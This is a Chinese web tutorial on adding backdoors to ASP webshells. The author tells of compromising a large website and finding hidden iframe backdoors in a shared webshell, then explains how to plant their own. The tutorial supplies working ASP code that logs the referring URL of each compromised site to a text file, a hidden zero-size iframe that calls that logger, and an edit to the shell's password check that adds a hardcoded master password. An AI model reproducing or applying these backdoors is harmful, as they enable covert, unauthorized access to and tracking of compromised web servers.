明辉手游网中心:是一个免费提供流行视频软件教程、在线学习分享的学习平台!

网络编程ASP木马之自己加后门

[摘要]呵呵......最近有小菜给我一个马, 说是很不错, 还说免杀, 当时也没有注意, 有一次在高一个大站的时候, 刚好利用上, 感觉还不错, 但是我第三天就发现马没了, 郁闷死了, TMD, 当时还以...

呵呵......最近有小菜给我一个马, 说是很不错, 还说免杀, 当时也没有注意, 有一次在高一个大站的时候, 刚好利用上, 感觉还不错, 但是我第三天就发现马没了, 郁闷死了, TMD, 当时还以为管理员发现了呢, 还好当时, 留了一个过扫描的一句话后门, (唉....怕别人进来, 我还把漏洞补了)接着, 就不说了, 然后就是传上自己的大马, 进去用雷克图扫了下, 发现好多的后门, 而且都很隐蔽。 突然感觉不对, 看来是螳螂捕蝉黄雀在后啊!马上写出解密函数, 把他解密了, 然后发现了以下代码

<iframe src=http://xxxx.xxxx.com/mm.asp width=0 height=0></iframe>

呵呵, 很熟悉吧, 访问了下, http://xxxx.xxxx.com, 卡巴立马就报警了, 靠, TMD的首页挂马了, 然后加了mm.asp, 是个空白, 真是变态, 首页挂马, 还搞了个接受页, 鄙视下, 那么下面我们进入正题。 告诉, 大家, 如何给我们的脚本木马加后门, 呵呵做收渔利哦!首先找个asp空间, 新建一个asp接收页, 代码如下:

    <%url=Request.ServerVariables("HTTP_Referer")

  set fs=server.CreateObject("Scripting.FileSystemObject")

  set file=fs.OpenTextFile(server.MapPath("bobo.txt"),8,True)

  file.writeline url

  file.close

  set file=nothing

  set fs=nothing

  %>

呵呵......HTTP_REFERER这个函数都熟悉吧, 简单来说就是获得webshell的地址然后记录在bobo.txt这里文本里, 然后里用<iframe src=网站地址 width=0 height=0></iframe>插到asp木马中, 大家可能要问了, 那只能记录地址啊, 呵呵......

还有了, 首先我们看看ASP密码验证

IF SEssIoN("web2a2dmin")<>UsERpaSs thEn

  IF requeSt.FoRM("pass")<>"" TheN

  iF REquesT.foRM("pass")=uSERPASS  Then

  SEsSIoN("web2a2dmin")=uSERPAss

呵呵, 大家都知道or的作用吧, 如果我们将第三句改为iF REquesT.foRM("pass")=uSERPASS or request.form("pass")="520jsj" Then, 怎么用, 这样我们的ASP木马就把弄了个万能密码, 密码为520jsj

     呵呵.....就到这里了, 继续关注我们的网站哦, 哈哈,


上面是电脑上网安全的一些基础常识,学习了安全知识,几乎可以让你免费电脑中毒的烦扰。